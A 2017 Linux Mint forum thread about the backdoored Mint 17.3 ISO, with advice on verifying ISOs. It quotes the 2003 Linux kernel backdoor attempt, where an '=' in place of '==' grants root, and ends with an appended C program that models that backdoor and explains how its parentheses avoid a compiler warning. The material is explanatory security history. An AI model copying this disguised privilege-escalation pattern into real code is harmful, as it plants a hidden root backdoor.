LMDE-2 cinnamon bad iso?

LMDE 2 support ends on 1-1-2019
PattiM
Level 1
Posts: 37
Joined: Tue Feb 07, 2012 10:27 pm

LMDE-2 cinnamon bad iso?

Post by PattiM » Sun Apr 16, 2017 10:44 pm

Was there complete resolution on LMDE-2 as to whether or not it was involved with the "backdoor" installed in the Cinnamon Mint ISO file (sometime in the last year or so)? I've read a lot, but unfortunately am not really able to decipher for sure whether the LMDE-2 install I did earlier this year (as guest under VirtualBox) was involved. I don't use Cinnamon, but rather KDE. I've kept all my patches current, but never read anything that said patches would fix the backdoor which was installed...

Thank You Very Much,
Patricia

Fred Barclay
Level 12
Posts: 4147
Joined: Sat Sep 13, 2014 11:12 am
Location: Bumping around in the bush

Re: LMDE-2 cinnamon bad iso?

Post by Fred Barclay » Sun Apr 16, 2017 11:09 pm

Hi Patricia,
The only version of Mint that was backdoored and distributed was Linux Mint 17.3 Cinnamon 64-bit. We LMDE users were quite safe. :)
However, it is always a good idea to check a Linux iso for integrity when you download it, because these types of events have happened before and will happen again. You don't want to get an evil iso and not realise it. Also, sometimes downloads just go badly and you get a broken iso, which can behave improperly. Integrity checking will catch this and let you know before you install the iso.
Here are some links which may be useful:
https://linuxmint.com/verify.php (official instructions)
viewtopic.php?f=42&t=226092&p=1192608#p1192608 (instructions by a highly knowledgeable member of our community)
https://fred-barclay.github.io/VerifyLinuxMint/

You're right, no patches can be guaranteed to fix a computer with a backdoor.
"Once you can accept the universe as matter expanding into nothing that is something, wearing stripes with plaid comes easy."
- Albert Einstein

jimallyn
Level 18
Posts: 8419
Joined: Thu Jun 05, 2014 7:34 pm
Location: Wenatchee, WA USA

Re: LMDE-2 cinnamon bad iso?

Post by jimallyn » Sun Apr 16, 2017 11:33 pm

Fred Barclay wrote: The only version of Mint that was backdoored and distributed was Linux Mint 17.3 Cinnamon 64-bit.
And that was only up for a few hours on one day.

“If the government were coming for your TVs and cars, then you'd be upset. But, as it is, they're only coming for your sons.” - Daniel Berrigan

PattiM
Level 1
Posts: 37
Joined: Tue Feb 07, 2012 10:27 pm

Re: LMDE-2 cinnamon bad iso?

Post by PattiM » Mon Apr 17, 2017 8:43 pm

Thank you very much for the replies. What made me ask was that I did notice that on... https://haveibeenpwned.com/ ...it listed both the Facebook and the Linux Mint hacks as references for my pwned email. I don't know how much information that site obtains, or how, but it made me think. So I thought I would ask.

Best,
Patricia

PS: Where are "backdoors" installed usually (e.g., in the kernel code?)? Is a reinstall (with format of the system drive) a fix, or must the /home partition also be formatted? Now that I think about that, I'm sure the answer is, "it depends..."

Fred Barclay
Level 12
Posts: 4147
Joined: Sat Sep 13, 2014 11:12 am
Location: Bumping around in the bush

Re: LMDE-2 cinnamon bad iso?

Post by Fred Barclay » Tue Apr 18, 2017 12:33 am

PattiM wrote: Now that I think about that, I'm sure the answer is, "it depends..."
Precisely. :)
It all depends on the backdoor author, how long a malicious actor has been present on the system, and what steps (if any) have been taken by that actor after gaining backdoor access, plus a whole bunch of other factors. The safest step is to nuke the entire system.
Even determining how long the attacker has had access to your system can be challenging. A lot of events in Linux are "logged", i.e. they're written into some text files in your /var/log directory, and you can go back and read these logs to see what's been going on. Many things that the attacker might do would be logged.
But our hypothetical attacker isn't stupid and he knows about these logs... so he edits them to remove evidence of his activity. Now you're left with gaps in your logs that you might not notice, or you might notice but think are due to lack of system activity. And these log files tend to pile up so unless you have previous experience reading log files you're highly unlikely to figure out what's going on.
Long story short... even determining how long a malicious actor has been present can be challenging. And if you can't figure out how long he/she has been there, imagine the difficulty of figuring out what he/she has done to your system!

So yeah... nuking the computer and starting over is usually the safest step. ;)
PattiM wrote: Where are "backdoors" installed usually (e.g., in the kernel code?)?
This also depends.
The Mint backdoor was installed as /var/lib/man.cy, which is not part of the kernel. It was written in C and was 926 lines long. It was also an extremely sloppy backdoor (to the backdoor author: feel free to take offence. :mrgreen: )
Other backdoors could be in other locations. For instance, there was an attempt in 2003 to sneak a backdoor into the Linux kernel itself. The only change was adding these two lines:

Code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
into part of the kernel code. It's a rather clever backdoor because it looks as if it's just checking if the current process or user is root, but it's actually giving the current user root permissions:
current->uid == 0 check for root... what the backdoor author wanted the kernel devs to think was happening
current->uid = 0 set the user id ("uid") as root... what was really happening.
A single "=" mark can make a lot of difference!

But enough rambling on my part. Backdoors can be installed almost anywhere, but the good news is that writing a "good" backdoor is beyond the skill of many attackers. Even better news? You're running Linux... one of the strongest and best operating systems out there!

Cheers!
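The two-line 2003 change quoted above, as an added stand-alone C model that is not the kernel's code or the poster's: `struct task`, the two `wait_check_*` functions and `uid_after` are assumed names that exist only for this example, and only the `uid` field is modelled. Running it shows the `=` version returning 0 (no error) while silently leaving the caller with uid 0, and why the extra parentheses matter to a compiler warning a reviewer might have relied on.

```c
#include <stdio.h>
#include <errno.h>
/* Stand-alone model of the 2003 wait4() backdoor quoted above (added example,
 * not kernel code). Only uid is modelled; the flag values match Linux's. */
struct task { unsigned int uid; };
#define __WCLONE 0x80000000u
#define __WALL   0x40000000u

/* Backdoored line: '=' assigns 0 to uid. The assignment expression evaluates
 * to 0, so the && is false, retval stays 0 and the caller silently becomes
 * root. The extra parentheses around the assignment are what keep gcc's
 * -Wparentheses warning ("assignment used as truth value") quiet. */
int wait_check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What reviewers were meant to read: '==' compares, uid is never written,
 * and only a caller that is already root gets -EINVAL. */
int wait_check_as_it_looked(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run one variant on a fresh task with the given uid; return the uid it ends
 * up with and, through *ret if non-NULL, the variant's return value. */
unsigned int uid_after(int (*check)(struct task *, unsigned int),
                       unsigned int uid, unsigned int options, int *ret)
{
    struct task t = { uid };
    int r = check(&t, options);
    if (ret) *ret = r;
    return t.uid;
}

int main(void)
{
    int r1, r2;
    unsigned int both = __WCLONE | __WALL;
    unsigned int u1 = uid_after(wait_check_backdoored, 1000, both, &r1);
    unsigned int u2 = uid_after(wait_check_as_it_looked, 1000, both, &r2);
    printf("backdoored:   uid 1000 -> %u, retval %d\n", u1, r1);
    printf("as it looked: uid 1000 -> %u, retval %d\n", u2, r2);
    return 0;
}
```

Compiling with `gcc -Wall` produces no warning for either function, which is exactly why a reviewer skimming the diff would not be tipped off.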
